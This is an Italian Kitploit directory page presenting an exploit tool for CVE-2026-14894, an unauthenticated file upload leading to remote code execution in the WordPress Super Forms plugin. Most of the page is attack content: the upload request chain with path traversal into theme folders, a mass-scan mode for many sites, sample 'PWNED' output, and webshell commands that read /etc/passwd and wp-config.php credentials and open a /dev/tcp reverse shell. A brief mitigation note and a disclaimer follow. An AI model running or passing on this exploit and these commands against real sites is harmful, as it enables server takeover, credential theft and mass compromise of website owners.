Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-14894 — Exploit per CVE-2026-14894, un upload di file non autenticato a RCE in WordPress Super Forms ≤ 6.3.313. Carica webshell PHP e supporta lo sfruttamento singolo o di massa. | Kitploit
Strumenti/GitHubGitHub/1beelze/cve-2026-14894
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHub1beelze/cve-2026-14894

CVE-2026-14894

Exploit per CVE-2026-14894, un upload di file non autenticato a RCE in WordPress Super Forms ≤ 6.3.313. Carica webshell PHP e supporta lo sfruttamento singolo o di massa.

Vedi Repository
21 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-14894 — Super Forms ≤ 6.3.313


Panoramica

Caricamento arbitrario di file non autenticato → Esecuzione remota di codice nel plugin WordPress Super Forms versioni ≤ 6.3.313.

La vulnerabilità risiede nel gestore AJAX che elabora i caricamenti di file tramite un campo senza convalidare l'estensione del file o il tipo MIME prima di scrivere su disco. Un attacker non autenticato può caricare una webshell PHP e ottenere l'esecuzione remota completa di codice sul server di destinazione.

super_submit_form
datauristring

Dettagli della vulnerabilità

CampoDettaglio
CVE IDCVE-2026-14894
PluginSuper Forms (WordPress)
Versioni affette≤ 6.3.313
Corretta6.3.314 (impone estensione .pdf + contenimento realpath)
CVSS9.8 Critico
Autenticazione richiestaNessuna
Ricercatoreandrea bocchetti
Azione AJAXsuper_submit_form
Sinkcampo datauristring → class-ajax.php:2762–2766
Percorso di caricamento/wp-content/uploads/superforms/YYYY/MM/<13digits>/

Catena di attacco

root@kitploit:~
[1] Genera nonce (nopriv)
    POST /wp-admin/admin-ajax.php
    action=super_create_nonce
         │
         ▼
[2] Carica shell PHP tramite datauristring (non autenticato)
    POST /wp-admin/admin-ajax.php
    action=super_submit_form
    data={"sf_upload_field":{"files":[{"datauristring":"data:image/png;base64,..."}]}}
         │
         ├── Path Traversal → /wp-content/themes/<theme>/shell.php  ← primario
         │                                                             (sempre eseguito)
         │
         └── Cartella casuale → /wp-content/uploads/superforms/...      ← fallback
                              (esecuzione dipende dalla policy del server)
         │
         ▼
[3] Scoperta shell
    ├── S0: media?parent=entry_id  (WP REST)
    ├── S1: REST /wp/v2/media search (non autenticato)
    ├── S2: Elenco directory Apache/nginx
    └── S3: XML allegati sitemap WP
         │
         ▼
[4] RCE → curl "http://target/wp-content/themes/theme/shell.php?c=id"

Requisiti

root@kitploit:~
pip install requests urllib3
  • Python 3.8+
  • Accesso di rete al sito WordPress di destinazione

Utilizzo

Singolo target

root@kitploit:~
python cve-2026-14894.py
root@kitploit:~
  CVE-2026-14894  │  Super Forms ≤ 6.3.313
  Unauthenticated File Upload → Remote Code Execution
  Researcher: andrea bocchetti  |  PoC: Beelze

  1  Single target
  2  Mass targets (file)

  Mode (1/2): 1

  Target URL               : https://target.com
  Form ID  (enter=auto)    :                      ← leave blank = auto-discover
  Shell name (enter=random):                      ← leave blank = random name
  Shell file (enter=built-in):                    ← leave blank = built-in shell
  WP user  (optional/REST) :                      ← optional, improves discovery
  WP pass  (optional/REST) :                      ← optional

Output previsto in caso di successo:

root@kitploit:~
  ──────────────────────────────────────────────────────────────
  TARGET  https://target.com
  ──────────────────────────────────────────────────────────────

  Super Forms v6.3.301  vulnerable ≤6.3.313
  [1/3] Mint nonce  ......................  ✔  OK  a3f9e1c...  sid=sess_ab...
  [2/3] Upload [xkqmhzjt.php]  ..........  ✔  OK  form_id=42  entry_id=137
  [3/3] Shell discovery  ................  ✔  FOUND → RCE [path traversal → theme]

  ╔══════════════════════════════════════════════════════════════╗
  ║  ✓  PWNED → RCE CONFIRMED                                   ║
  ║                                                              ║
  ║  Shell  »  https://target.com/wp-content/themes/astra/shell ║
  ║  RCE    »  uid=33(www-data) gid=33(www-data)                ║
  ║                                                              ║
  ║  $ curl "https://target.com/...shell.php?c=whoami"          ║
  ╚══════════════════════════════════════════════════════════════╝

Scansione di massa

root@kitploit:~
  Mode (1/2): 2

  Targets file             : targets.txt     ← one URL per line, # = comment
  Form ID  (enter=auto)    :
  Threads  (enter=5)       : 10
  Shell file (enter=built-in):
  WP user  (optional/REST) :
  WP pass  (optional/REST) :

Formato targets.txt:

root@kitploit:~
# Bug bounty scope
https://site1.com
https://site2.com
https://site3.com

Output scansione di massa:

root@kitploit:~
  ══════════════════════════════════════════════════════════════
  MASS SCAN  3 targets  threads=10
  ══════════════════════════════════════════════════════════════

  [01/03]  https://site1.com  ....  RCE     uid=33(www-data)
           ↳ https://site1.com/wp-content/themes/astra/xkqmhzjt.php
  [02/03]  https://site2.com  ....  WRITE   no exec
           ↳ https://site2.com/wp-content/uploads/superforms/2026/07/.../shell.php
  [03/03]  https://site3.com  ....  FAIL    plugin inactive / blocked

  ══════════════════════════════════════════════════════════════
  SUMMARY  1 RCE  1 WRITE_ONLY  0 MAYBE  / 3 total
  ══════════════════════════════════════════════════════════════

  RCE SHELLS:
  »  https://site1.com/wp-content/themes/astra/xkqmhzjt.php  (uid=33...)

Shell personalizzata

Puoi fornire il tuo file shell invece della webshell incorporata:

root@kitploit:~
  Shell file (enter=built-in): /path/to/myshell.php

Lo strumento caricherà il tuo file e tratterà qualsiasi risposta 200 con un corpo non vuoto come conferma RCE.


Interazione con la shell

Dopo aver ottenuto l'RCE, interagisci con la shell:

root@kitploit:~
# Command execution
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=id"
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=cat+/etc/passwd"

# Read WordPress config (creds, DB)
curl -sk "https://target.com/.../shell.php?c=cat+/var/www/html/wp-config.php"

# Reverse shell
curl -sk "https://target.com/.../shell.php" --data "c=bash+-c+'bash+-i+>%26+/dev/tcp/LHOST/LPORT+0>%261'"

Output

I risultati vengono automaticamente salvati in:

root@kitploit:~
~/Documents/CVE-2026-14894/result_YYYYMMDD_HHMMSS.json

Codici di stato

StatoSignificato
RCEShell PHP confermata in esecuzione — esecuzione remota completa del codice
WRITE_ONLYFile scritto ma PHP non eseguito (motore disattivato / negato da .htaccess)
POSSIBLE_WRITECaricamento riuscito ma l'URL della shell non può essere risolto
FAILPlugin inattivo, nonce fallito, o versione corretta rilevata

Mitigazione

Aggiorna Super Forms alla versione ≥ 6.3.314. La patch impone l'estensione solo .pdf nei caricamenti datauristring e aggiunge il contenimento realpath() per prevenire il path traversal.


Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test di penetrazione autorizzati, ricerca bug bounty e scopi educativi.
Non utilizzarlo contro sistemi per i quali non hai esplicita autorizzazione scritta a testare.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.


CVE-2026-14894 · Super Forms ≤ 6.3.313 · Caricamento file non autenticato RCE
Ricercatore: andrea bocchetti · PoC: Beelze

Scarica lo strumento